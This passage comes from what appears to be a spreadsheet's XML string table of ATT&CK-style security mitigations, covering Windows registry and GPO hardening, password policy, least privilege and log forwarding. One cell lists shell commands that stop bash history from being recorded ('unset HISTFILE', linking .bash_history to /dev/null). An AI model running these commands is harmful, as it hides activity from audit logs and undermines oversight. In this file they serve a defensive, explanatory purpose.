    <t xml:space="preserve">Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM. The associated Registry key is located at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl&lt;/code&gt;. The setting can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled. (Citation: TechNet Server Operator Scheduled Task) </t>
  </si>
  <si>
    <t xml:space="preserve">
Consider reducing the default BITS job lifetime in Group Policy or by editing the &lt;code&gt;JobInactivityTimeout&lt;/code&gt; and &lt;code&gt;MaxDownloadTime&lt;/code&gt; Registry values in &lt;code&gt; HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS&lt;/code&gt;.(Citation: Microsoft BITS)</t>
  </si>
  <si>
    <t>There are multiple methods of preventing a user's command history from being flushed to their .bash_history file, including use of the following commands:
&lt;code&gt;set +o history&lt;/code&gt; and &lt;code&gt;set -o history&lt;/code&gt; to start logging again;
&lt;code&gt;unset HISTFILE&lt;/code&gt; being added to a user's .bash_rc file; and
&lt;code&gt;ln -s /dev/null ~/.bash_history&lt;/code&gt; to write commands to &lt;code&gt;/dev/null&lt;/code&gt;instead.</t>
  </si>
  <si>
    <t>Consider limiting the number of cached credentials (HKLM\SOFTWARE\Microsoft\Windows NT\Current Version\Winlogon\cachedlogonscountvalue)(Citation: Tilbury Windows Credentials)</t>
  </si>
  <si>
    <t>Disallow or restrict removable media at an organizational policy level if they are not required for business operations.(Citation: TechNet Removable Media Control)</t>
  </si>
  <si>
    <t>Protect domain controllers by ensuring proper security configuration for critical servers.</t>
  </si>
  <si>
    <t xml:space="preserve">Ensure that Driver Signature Enforcement is enabled to restrict unsigned drivers from being installed. </t>
  </si>
  <si>
    <t>Prevent administrator accounts from being enumerated when an application is elevating through UAC since it can lead to the disclosure of account names. The Registry key is located at &lt;code&gt;HKLM\ SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CredUI\EnumerateAdministrators&lt;/code&gt;. It can be disabled through GPO: Computer Configuration &gt; [Policies] &gt; Administrative Templates &gt; Windows Components &gt; Credential User Interface: Enumerate administrator accounts on elevation.(Citation: UCF STIG Elevation Account Enumeration)</t>
  </si>
  <si>
    <t>Disable the default to “hide file extensions for known file types” in Windows OS.(Citation: Seqrite DoubleExtension)(Citation: HowToGeek ShowExtension)</t>
  </si>
  <si>
    <t>When System Integrity Protection (SIP) is enabled in macOS, the aforementioned environment variables are ignored when executing protected binaries. Third-party applications can also leverage Apple’s Hardened Runtime, ensuring these environment variables are subject to imposed restrictions.(Citation: Apple Developer Doco Hardened Runtime) Admins can add restrictions to applications by setting the setuid and/or setgid bits, use entitlements, or have a __RESTRICT segment in the Mach-O binary.</t>
  </si>
  <si>
    <t>Prevent the creation of new network adapters where possible.</t>
  </si>
  <si>
    <t>Prevent the creation of new network adapters where possible.(Citation: Microsoft GPO Bluetooth FEB 2009)(Citation: TechRepublic Wireless GPO FEB 2009)</t>
  </si>
  <si>
    <t>If the computer is domain joined, then group policy can help restrict the ability to create or hide users. Similarly, preventing the modification of the &lt;code&gt;/Library/Preferences/com.apple.loginwindow&lt;/code&gt; &lt;code&gt;Hide500Users&lt;/code&gt; value will force all users to be visible.</t>
  </si>
  <si>
    <t>Make sure that the &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable is set to “ignoredups” instead of “ignoreboth” or “ignorespace”.</t>
  </si>
  <si>
    <t xml:space="preserve">Consider technical controls to prevent the disabling of services or deletion of files involved in system recovery. </t>
  </si>
  <si>
    <t>Windows Group Policy can be used to manage root certificates and the &lt;code&gt;Flags&lt;/code&gt; value of &lt;code&gt;HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots&lt;/code&gt; can be set to 1 to prevent non-administrator users from making further root installations into their own HKCU certificate store. (Citation: SpectorOps Code Signing Dec 2017)</t>
  </si>
  <si>
    <t>Consider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012) Consider disabling WDigest authentication.(Citation: Microsoft WDigest Mit)</t>
  </si>
  <si>
    <t xml:space="preserve">Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (`C:\Windows\System32\` by default) of a domain controller and/or local computer with a corresponding entry in `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages`. </t>
  </si>
  <si>
    <t>Enable Windows Group Policy “Do Not Allow Anonymous Enumeration of SAM Accounts and Shares” security setting to limit users who can enumerate network shares.(Citation: Windows Anonymous Enumeration of SAM Accounts)</t>
  </si>
  <si>
    <t xml:space="preserve">
Consider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012) Consider disabling WDigest authentication.(Citation: Microsoft WDigest Mit)</t>
  </si>
  <si>
    <t>Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (C:\Windows\System32\ by default) of a domain controller and/or local computer with a corresponding entry in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages.</t>
  </si>
  <si>
    <t>Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active. Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server.(Citation: Windows RDP Sessions)</t>
  </si>
  <si>
    <t>Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM. The associated Registry key is located at HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl. The setting can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled. (Citation: TechNet Server Operator Scheduled Task)</t>
  </si>
  <si>
    <t>Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM. The associated Registry key is located at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl&lt;/code&gt;. The setting can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled. (Citation: TechNet Server Operator Scheduled Task)</t>
  </si>
  <si>
    <t>Consider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012)</t>
  </si>
  <si>
    <t>Applications with known vulnerabilities or known shell escapes should not have the setuid or setgid bits set to reduce potential damage if an application is compromised. Additionally, the number of programs with setuid or setgid bits set should be minimized across a system.</t>
  </si>
  <si>
    <t>Ensuring that the &lt;code&gt;tty_tickets&lt;/code&gt; setting is enabled will prevent this leakage across tty sessions.</t>
  </si>
  <si>
    <t>Follow vendor device hardening best practices to disable unnecessary and unused features and services, avoid using default configurations and passwords, and introduce logging and auditing for detection.</t>
  </si>
  <si>
    <t>Ensure that root accounts have complex, unique passwords across all systems on the network.</t>
  </si>
  <si>
    <t>Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire. Also consider using Group Managed Service Accounts or another third party product such as password vaulting. (Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>Refer to NIST guidelines when creating password policies.(Citation: NIST 800-63-3)</t>
  </si>
  <si>
    <t>Ensure that local administrator accounts have complex, unique passwords across all systems on the network.</t>
  </si>
  <si>
    <t>Ensure that cloud accounts, particularly privileged accounts, have complex, unique passwords across all systems on the network. Passwords and access keys should be rotated regularly. This limits the amount of time credentials can be used to access resources if a credential is compromised without your knowledge. Cloud service providers may track access key age to help audit and identify keys that may need to be rotated.(Citation: AWS - IAM Console Best Practices)</t>
  </si>
  <si>
    <t>Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)</t>
  </si>
  <si>
    <t>Establish an organizational policy that prohibits password storage in files.</t>
  </si>
  <si>
    <t>The password for the user's login keychain can be changed from the user's login password. This increases the complexity for an adversary because they need to know an additional password.
Organizations may consider weighing the risk of storing credentials in password stores and web browsers. If system, software, or web browser credential disclosure is a significant concern, technical controls, policy, and user training may be used to prevent storage of credentials in improper locations.</t>
  </si>
  <si>
    <t>Organizations may consider weighing the risk of storing credentials in web browsers. If web browser credential disclosure is a significant concern, technical controls, policy, and user training may be used to prevent storage of credentials in web browsers.</t>
  </si>
  <si>
    <t>Do not store credentials within the Registry.</t>
  </si>
  <si>
    <t>Applications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment. (Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet)</t>
  </si>
  <si>
    <t>Refer to NIST guidelines when creating password policies.  (Citation: NIST 800-63-3)</t>
  </si>
  <si>
    <t>Use strong passwords to increase the difficulty of credential hashes from being cracked if they are obtained.</t>
  </si>
  <si>
    <t>Ensure strong password length (ideally 25+ characters) and complexity for service accounts and that these passwords periodically expire.(Citation: AdSecurity Cracking Kerberos Dec 2015) Also consider using Group Managed Service Accounts or another third party product such as password vaulting.(Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>The password for the user's login keychain can be changed from the user's login password. This increases the complexity for an adversary because they need to know an additional password.</t>
  </si>
  <si>
    <t>Ensure that &lt;code&gt;AllowReversiblePasswordEncryption&lt;/code&gt; property is set to disabled unless there are application requirements.(Citation: store_pwd_rev_enc)</t>
  </si>
  <si>
    <t>Ensure that local administrator accounts have complex, unique passwords.</t>
  </si>
  <si>
    <t>Refer to NIST guidelines when creating password policies for master passwords.(Citation: NIST 800-63-3)</t>
  </si>
  <si>
    <t>Ensure only valid password filters are registered. Filter DLLs must be present in Windows installation directory (&lt;code&gt;C:\Windows\System32\&lt;/code&gt; by default) of a domain controller and/or local computer with a corresponding entry in &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages&lt;/code&gt;. (Citation: Microsoft Install Password Filter n.d)</t>
  </si>
  <si>
    <t>Use strong passphrases for private keys to make cracking difficult.</t>
  </si>
  <si>
    <t>Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed.</t>
  </si>
  <si>
    <t>Ensure SSH key pairs have strong passwords and refrain from using key-store technologies such as ssh-agent unless they are properly protected.</t>
  </si>
  <si>
    <t>Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network.</t>
  </si>
  <si>
    <t>Consider rotating access keys within a certain number of days to reduce the effectiveness of stolen credentials.</t>
  </si>
  <si>
    <t>Use strong passphrases for private keys to make cracking difficult. Do not store credentials within the Registry. Establish an organizational policy that prohibits password storage in files.</t>
  </si>
  <si>
    <t>Applications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment. (Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet) When possible, applications that use SSH keys should be updated periodically and properly secured.</t>
  </si>
  <si>
    <t>This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.</t>
  </si>
  <si>
    <t>This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.</t>
  </si>
  <si>
    <t xml:space="preserve">This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. </t>
  </si>
  <si>
    <t>This cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.</t>
  </si>
  <si>
    <t>Organizations may intentionally register similar domains to their own to deter adversaries from creating typosquatting domains. Other facets of this technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.</t>
  </si>
  <si>
    <t>Follow best practices in restricting access to privileged accounts to avoid hostile programs from accessing such sensitive information.</t>
  </si>
  <si>
    <t>Remove users from the local administrator group on systems.
By requiring a password, even if an adversary can get terminal access, they must know the password to run anything in the sudoers file. Setting the timestamp_timeout to 0 will require the user to input their password every time sudo is executed.</t>
  </si>
  <si>
    <t>Limit permissions so that users and user groups cannot create tokens. This setting should be defined for the local system account only. GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Create a token object. (Citation: Microsoft Create Token) Also define who can create a process level token to only the local and network service through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Replace a process level token.(Citation: Microsoft Replace Process Token)
Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command &lt;code&gt;runas&lt;/code&gt;.(Citation: Microsoft runas)</t>
  </si>
  <si>
    <t>Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</t>
  </si>
  <si>
    <t>Do not allow domain administrator or root accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</t>
  </si>
  <si>
    <t>Ensure that all accounts use the least privileges they require.</t>
  </si>
  <si>
    <t>Configure the Increase Scheduling Priority option to only allow the Administrators group the rights to schedule a priority process. This can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Increase scheduling priority. (Citation: TechNet Scheduling Priority)</t>
  </si>
  <si>
    <t>Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to install a bootkit.</t>
  </si>
  <si>
    <t>Ensure containers are not running as root by default. In Kubernetes environments, consider defining a Pod Security Policy that prevents pods from running privileged containers.(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>Remove users from the local administrator group on systems.</t>
  </si>
  <si>
    <t>Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.</t>
  </si>
  <si>
    <t>Do not allow privileged accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</t>
  </si>
  <si>
    <t>Review privileged cloud account permission levels routinely to look for those that could allow an adversary to gain wide access.(Citation: TechNet Credential Theft)(Citation: TechNet Least Privilege) These reviews should also check if new privileged cloud accounts have been created that were not authorized.</t>
  </si>
  <si>
    <t>Limit the usage of local administrator and domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries.</t>
  </si>
  <si>
    <t>When PowerShell is necessary, restrict PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.(Citation: Netspi PowerShell Execution Policy Bypass)</t>
  </si>
  <si>
    <t>Modify Registry settings (directly or using Dcomcnfg.exe) in `HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\AppID\\{AppID_GUID}` associated with the process-wide security of individual COM applications.(Citation: Microsoft Process Wide Com Keys)
Modify Registry settings (directly or using Dcomcnfg.exe) in `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole` associated with system-wide security defaults for all COM applications that do no set their own process-wide security.(Citation: Microsoft System Wide Com Keys) (Citation: Microsoft COM ACL)</t>
  </si>
  <si>
    <t>Use the principle of least privilege for privileged accounts such as the service account in Kubernetes.</t>
  </si>
  <si>
    <t>If it is necessary that software must store credentials in the Registry, then ensure the associated accounts have limited permissions so they cannot be abused if obtained by an adversary.</t>
  </si>
  <si>
    <t>Modify Registry settings (directly or using Dcomcnfg.exe) in `HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{{AppID_GUID}}` associated with the process-wide security of individual COM applications.(Citation: Microsoft Process Wide Com Keys)
Modify Registry settings (directly or using Dcomcnfg.exe) in `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole` associated with system-wide security defaults for all COM applications that do not set their own process-wide security.(Citation: Microsoft System Wide Com Keys) (Citation: Microsoft COM ACL)</t>
  </si>
  <si>
    <t>Audit domain account permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled and use of accounts is segmented, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. Limit credential overlap across systems to prevent access if account credentials are obtained.</t>
  </si>
  <si>
    <t>Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)</t>
  </si>
  <si>
    <t>Use least privilege and protect administrative access to the Domain Controller and Active Directory Federation Services (AD FS) server. Do not create service accounts with administrative privileges.</t>
  </si>
  <si>
    <t>Use the principal of least privilege and protect administrative access to domain trusts.</t>
  </si>
  <si>
    <t>Restrict administrator accounts to as few individuals as possible, following least privilege principles.  Prevent credential overlap across systems of administrator and privileged accounts, particularly between network and non-network platforms, such as servers or endpoints.</t>
  </si>
  <si>
    <t>Ensure containers are not running as root by default and do not use unnecessary privileges or mounted components. In Kubernetes environments, consider defining a Pod Security Policy that prevents pods from running privileged containers.(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>Use least privilege for service accounts will limit what permissions the exploited process gets on the rest of the system.</t>
  </si>
  <si>
    <t>Minimize permissions and access for service accounts to limit impact of exploitation.</t>
  </si>
  <si>
    <t>Ensure critical system files as well as those known to be abused by adversaries have restrictive permissions and are owned by an appropriately privileged account, especially if access is not required by users nor will inhibit system functionality.</t>
  </si>
  <si>
    <t>Prevent adversary access to privileged accounts or access necessary to replace system firmware.</t>
  </si>
  <si>
    <t>Restrict permissions and access to the AD FS server to only originate from privileged access workstations.(Citation: FireEye ADFS)</t>
  </si>
  <si>
    <t>Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts.</t>
  </si>
  <si>
    <t>Limit on-premises accounts with access to the hybrid identity solution in place. For example, limit Azure AD Global Administrator accounts to only those required, and ensure that these are dedicated cloud-only accounts rather than hybrid ones.(Citation: MagicWeb)</t>
  </si>
  <si>
    <t>Do not allow administrator accounts that have permissions to add IIS components to be used for day-to-day operations that may expose these permissions to potential adversaries and/or other unprivileged systems.</t>
  </si>
  <si>
    <t>Limit permissions associated with creating and modifying platform images or containers based on the principle of least privilege.</t>
  </si>
  <si>
    <t>Limit service accounts to minimal required privileges, including membership in privileged groups such as Domain Administrators.(Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>Limit access to the root account and prevent users from loading kernel modules and extensions through proper privilege separation and limiting Privilege Escalation opportunities.</t>
  </si>
  <si>
    <t>Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.(Citation: Tilbury Windows Credentials)</t>
  </si>
  <si>
    <t>Limit the usage of local administrator accounts to be used for day-to-day operations that may expose them to potential adversaries.</t>
  </si>
  <si>
    <t>Audit local accounts permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should check if new local accounts are created that have not be authorized. Implementing LAPS may help prevent reuse of local administrator credentials across a domain.(Citation: Microsoft Remote Use of Local)</t>
  </si>
  <si>
    <t>Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)
Limit access to the root account and prevent users from modifying protected components through proper privilege separation (ex SELinux, grsecurity, AppArmor, etc.) and limiting Privilege Escalation opportunities.
Limit on-premises accounts with access to the hybrid identity solution in place. For example, limit Azure AD Global Administrator accounts to only those required, and ensure that these are dedicated cloud-only accounts rather than hybrid ones.(Citation: MagicWeb)</t>
  </si>
  <si>
    <t>Restrict execution of Msiexec.exe to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage.</t>
  </si>
  <si>
    <t>Use of Authentication, Authorization, and Accounting (AAA) systems will limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse. TACACS+ can keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization(Citation: Cisco IOS Software Integrity Assurance - AAA) (Citation: Cisco IOS Software Integrity Assurance - TACACS)</t>
  </si>
  <si>
    <t>Windows:
Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.(Citation: Microsoft Securing Privileged Access)
Linux:
Scraping the passwords from memory requires root privileges. Follow best practices in restricting access to privileged accounts to avoid hostile programs from accessing such sensitive regions of memory.</t>
  </si>
  <si>
    <t>Limit credential overlap across systems to prevent the damage of credential compromise and reduce the adversary's ability to perform Lateral Movement between systems.</t>
  </si>
  <si>
    <t>Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts.(Citation: ADSecurity AD Kerberos Attacks)</t>
  </si>
  <si>
    <t>Limit access to the root account and prevent users from modifying PAM components through proper privilege separation (ex SELinux, grsecurity, AppArmor, etc.) and limiting Privilege Escalation opportunities.</t>
  </si>
  <si>
    <t>Ensure proper permissions are in place to help prevent adversary access to privileged accounts necessary to perform these actions</t>
  </si>
  <si>
    <t>Follow best practices in restricting access to privileged accounts to avoid hostile programs from accessing sensitive information.</t>
  </si>
  <si>
    <t>Utilize Yama (ex: /proc/sys/kernel/yama/ptrace_scope) to mitigate ptrace based process injection by restricting the use of ptrace to privileged users only. Other mitigation controls involve the deployment of security kernel modules that provide advanced access control and process restrictions such as SELinux, grsecurity, and AppArmor.</t>
  </si>
  <si>
    <t xml:space="preserve">Utilize Yama (ex: /proc/sys/kernel/yama/ptrace_scope) to mitigate ptrace based process injection by restricting the use of ptrace to privileged users only. Other mitigation controls involve the deployment of security kernel modules that provide advanced access control and process restrictions such as SELinux, grsecurity, and AppArmor. </t>
  </si>
  <si>
    <t>Consider removing the local Administrators group from the list of groups allowed to log in through RDP.</t>
  </si>
  <si>
    <t>Do not allow remote access to services as a privileged account unless necessary.</t>
  </si>
  <si>
    <t>Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account.(Citation: TechNet Credential Theft)(Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.(Citation: Microsoft Securing Privileged Access)</t>
  </si>
  <si>
    <t>Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group multiple systems.</t>
  </si>
  <si>
    <t xml:space="preserve">Do not allow administrator accounts that have permissions to add component software on these services to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems. </t>
  </si>
  <si>
    <t>Do not allow remote access via SSH as root or other privileged accounts.</t>
  </si>
  <si>
    <t>Restrict administrator accounts to as few individuals as possible, following least privilege principles, that may be abused to remotely boot a machine in safe mode.(Citation: CyberArk Labs Safe Mode 2016)</t>
  </si>
  <si>
    <t>Configure the Increase Scheduling Priority option to only allow the Administrators group the rights to schedule a priority process. This can be can be configured through GPO: Computer Configuration &gt; [Policies] &gt; Windows Settings &gt; Security Settings &gt; Local Policies &gt; User Rights Assignment: Increase scheduling priority. (Citation: TechNet Scheduling Priority)</t>
  </si>
  <si>
    <t>Do not allow administrator accounts that have permissions to add component software on these services to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</t>
  </si>
  <si>
    <t>Ensure that permissions disallow services that run at a higher permissions level from being created or interacted with by a user with a lower permission level.</t>
  </si>
  <si>
    <t>Grant access to application deployment systems only to a limited number of authorized administrators.</t>
  </si>
  <si>
    <t>Limit domain admin account permissions to domain controllers and limited servers. Delegate other admin functions to separate accounts.
Limit service accounts to minimal required privileges, including membership in privileged groups such as Domain Administrators.(Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>By requiring a password, even if an adversary can get terminal access, they must know the password to run anything in the sudoers file. Setting the &lt;code&gt;timestamp_timeout&lt;/code&gt; to 0 will require the user to input their password every time &lt;code&gt;sudo&lt;/code&gt; is executed.</t>
  </si>
  <si>
    <t>Restrict execution of particularly vulnerable binaries to privileged accounts or groups that need to use it to lessen the opportunities for malicious usage.</t>
  </si>
  <si>
    <t>Prevent adversary access to privileged accounts or access necessary to perform this technique.</t>
  </si>
  <si>
    <t xml:space="preserve">The creation and modification of systemd service unit files is generally reserved for administrators such as the Linux root user and other users with superuser privileges. </t>
  </si>
  <si>
    <t xml:space="preserve">Limit access to the root account and prevent users from creating and/or modifying systemd timer unit files. </t>
  </si>
  <si>
    <t>Use of Authentication, Authorization, and Accounting (AAA) systems will limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse. TACACS+ can keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization. (Citation: Cisco IOS Software Integrity Assurance - AAA) (Citation: Cisco IOS Software Integrity Assurance - TACACS)</t>
  </si>
  <si>
    <t>Do not allow administrator accounts that have permissions to modify the Web content of organization login portals to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.</t>
  </si>
  <si>
    <t>Prevent credential overlap across systems of administrator and privileged accounts. (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>Prevent credential overlap across systems of administrator and privileged accounts.(Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>If the service is necessary, lock down critical enclaves with separate WinRM accounts and permissions.</t>
  </si>
  <si>
    <t>Windows 8.1, Windows Server 2012 R2, and later versions, may make LSA run as a Protected Process Light (PPL) by setting the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt;, which requires all DLLs loaded by LSA to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Enabled features, such as Protected Process Light (PPL), for LSA.(Citation: Microsoft LSA)</t>
  </si>
  <si>
    <t xml:space="preserve">On Windows 8.1 and Server 2012 R2, enable LSA Protection by setting the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\RunAsPPL&lt;/code&gt; to &lt;code&gt;dword:00000001&lt;/code&gt;. (Citation: Microsoft LSA Protection Mar 2014) LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance. </t>
  </si>
  <si>
    <t>On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA.(Citation: Microsoft LSA)</t>
  </si>
  <si>
    <t xml:space="preserve">
On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA.(Citation: Microsoft LSA)</t>
  </si>
  <si>
    <t>Windows 8.1, Windows Server 2012 R2, and later versions may make LSA run as a Protected Process Light (PPL) by setting the Registry key &lt;code&gt;HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\RunAsPPL&lt;/code&gt;, which requires all SSP DLLs to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>Encryption and off-system storage of sensitive information may be one way to mitigate collection of files, but may not stop an adversary from acquiring the information if an intrusion persists over a long period of time and the adversary is able to discover and access the data through other means.</t>
  </si>
  <si>
    <t>Forward logging of historical data to remote data store and centralized logging solution to preserve historical command line log data.</t>
  </si>
  <si>
    <t>Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system.</t>
  </si>
  <si>
    <t xml:space="preserve">Automatically forward mail data and events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system. </t>
  </si>
  <si>
    <t xml:space="preserve">Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system. </t>
  </si>
  <si>
    <t>Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and manipulate backups.</t>
  </si>
  <si>
    <t>If the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.</t>
  </si>
  <si>
    <t>The sudoers file should be strictly edited such that passwords are always required and that users can't spawn risky processes as users with higher privilege.</t>
  </si>
  <si>
    <t>Restrict write access to logon scripts to specific administrators.</t>
  </si>
  <si>
    <t>Preventing users from deleting or writing to certain files can stop adversaries from maliciously altering their &lt;code&gt;~/.bash_history&lt;/code&gt; or &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; files.</t>
  </si>
  <si>
    <t>Protect generated event files that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities.</t>
  </si>
  <si>
    <t xml:space="preserve">Protect generated event files that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities. </t>
  </si>
  <si>
    <t>Restrict storage and execution of Control Panel items to protected directories, such as &lt;code&gt;C:\Windows&lt;/code&gt;, rather than user directories.</t>
  </si>
  <si>
    <t>Restrict read/write access to system-level process files to only select privileged users who have a legitimate need to manage system services.</t>
  </si>
  <si>
    <t>Restrict file shares to specific directories with access only to necessary users.</t>
  </si>
  <si>
    <t>Ensure least privilege principles are applied to important information resources to reduce exposure to data manipulation risk.</t>
  </si>
  <si>
    <t>Use access control lists on storage systems and objects.</t>
  </si>
  <si>
